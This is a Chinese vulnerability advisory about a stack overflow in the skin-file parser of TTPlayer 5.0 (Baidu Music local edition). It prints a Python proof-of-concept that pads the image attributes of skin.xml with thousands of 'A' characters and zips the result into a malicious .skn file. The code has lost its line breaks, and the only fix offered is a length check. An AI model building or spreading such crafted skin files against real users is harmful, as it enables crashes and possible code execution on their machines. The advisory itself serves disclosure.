百度音乐本地版(TTPlayer5.0)存在所处堆栈溢出可执行任意代码
皮肤文件处理逻辑中多处缺少长度检查存在堆栈溢出
#!/usr/bin/pythonimport sys, time, os,zipfileimagefuzzer="A"*4096imagefuzzer1="A"skinxmltmp="<skin version=/"2/" name=/"fuck/" author=/"fucker/" url=/"http://fucker.com/" email=/"fucker@fucker.com/" transparent_color=/"#ff00ff/">/<player_window image=/"" + imagefuzzer1*512 + """ "><play position="8, 125, 38, 155" image=" """ + imagefuzzer +"""" /><pause position="8, 125, 38, 155" image=" """+imagefuzzer1+"""" /><stop position="43, 130, 63, 150" image=" """+imagefuzzer1+"""" /><prev position="70, 130, 90, 150" image="""+imagefuzzer1+"""" /><next position="95, 130, 115, 150" image="""+imagefuzzer1+"""" /><mute position="122, 130, 142, 150" image="""+imagefuzzer1+"""" /><open position="130, 3, 149, 22" image="""+imagefuzzer1+"""" /><lyric position="158, 3, 177, 22" image="lyric.bmp" /><equalizer position="180, 3, 199, 22" image="equalizer.bmp" /><playlist position="202, 3, 221, 22" image="playlist.bmp" /><minimize position="229, 6, 244, 21" image="minimize.bmp" /><exit position="245, 6, 260, 21" image="exit.bmp" /><progress position="18, 106, 248, 117" bar_image="" thumb_image="progress_thumb.bmp" /><volume position="151, 130, 217, 148" vertical="false" bar_image="" thumb_image="volume_thumb.bmp" fill_image="volume_fill.bmp" /><visual position="11, 30, 147, 78" /><icon position="8, 86, 24, 102" /><info position="28, 88, 258, 100" color="#ffff06" bkgnd="#000000" font="SimSun" font_size="12" /><led position="204, 32, 254, 45" image="number.bmp" align="right" /><stereo position="210, 50, 254, 62" color="#00ffff" bkgnd="#212741" font="SimSun" font_size="12" align="right" /><status position="181, 65, 254, 77" color="#dcdcdc" bkgnd="#212741" font="SimSun" font_size="12" align="right" /></player_window><lyric_window position="268, 0, 536, 165" resize_rect="14, 34, 256, 42" resize_tile="1" image="lyric_skin.bmp"><title position="0, 8, 55, 21" image="lyric_title.bmp" align="center" /><close position="245, 6, 260, 21" image="exit.bmp" align="right" /><lyric position="8, 28, 260, 52" /></lyric_window><equalizer_window position="268, 165, 536, 330" image="equalizer_skin.bmp" eq_interval="2"><close position="245, 6, 260, 21" image="exit.bmp" align="right" /><enabled position="12, 33, 31, 52" image="eq_enabled.bmp" /><profile position="34, 33, 53, 52" image="eq_profile.bmp" /><reset position="56, 33, 75, 52" image="eq_reset.bmp" /><balance position="111, 39, 162, 48" thumb_image="eq_balance.bmp" bar_image="" /><surround position="203, 39, 254, 48" thumb_image="eq_balance.bmp" bar_image="" /><preamp position="13, 74, 31, 154" thumb_image="eq_thumb.bmp" bar_image="" fill_image="eq_fill.bmp" /><eqfactor position="59, 74, 77, 154" thumb_image="eq_thumb.bmp" bar_image="" fill_image="eq_fill.bmp" /></equalizer_window><playlist_window position="0, 165, 268, 330" resize_rect="14, 54, 254, 76" resize_tile="1" image="playlist_skin.bmp"><title position="0, 8, 55, 21" image="playlist_title.bmp" align="center" /><close position="245, 6, 260, 21" image="exit.bmp" align="right" /><toolbar position="8, 24, 260, 44" image="playlist_toolbar.bmp" align="top+left"/><scrollbar buttons_image="scrollbar_button.bmp" thumb_image="scrollbar_thumb.bmp" bar_image="scrollbar_bar.bmp" thumb_resize_center="8" thumb_resize_tile="1"/><playlist position="9, 50, 259, 82"/></playlist_window></skin>"""buff = skinxmltmpgeneratefile = open(".//Classic//skin.xml", 'w')generatefile.write(buff)generatefile.close()zf=zipfile.ZipFile('Z://Classic.skn','w',zipfile.ZIP_DEFLATED)targetdir=".//Classic"print os.chdir(targetdir)for dp,dn,fn in os.walk("."):for f in fn:print os.path.join(dp,f)zf.write(os.path.join(dp,f))zf.close()
修复方案:
检查缓冲区长度
>更多相关文章
首页推荐
佛山市东联科技有限公司一直秉承“一切以用户价值为依归
- 01-11全球最受赞誉公司揭晓:苹果连续九年第一
- 12-09罗伯特·莫里斯:让黑客真正变黑
- 12-09谁闯入了中国网络?揭秘美国绝密黑客小组TA
- 12-09警示:iOS6 惊现“闪退”BUG
- 11-18LG新能源宣布与Bear Robotics达成合作,成为
- 11-18机构:三季度全球个人智能音频设备市场强势
- 11-18闲鱼:注册用户过6亿 AI技术已应用于闲置交
- 11-18美柚、宝宝树回应“涉黄短信骚扰”:未发现
- 11-01京东七鲜与前置仓完成融合
相关文章
24小时热门资讯
24小时回复排行
热门推荐
最新资讯
操作系统
黑客防御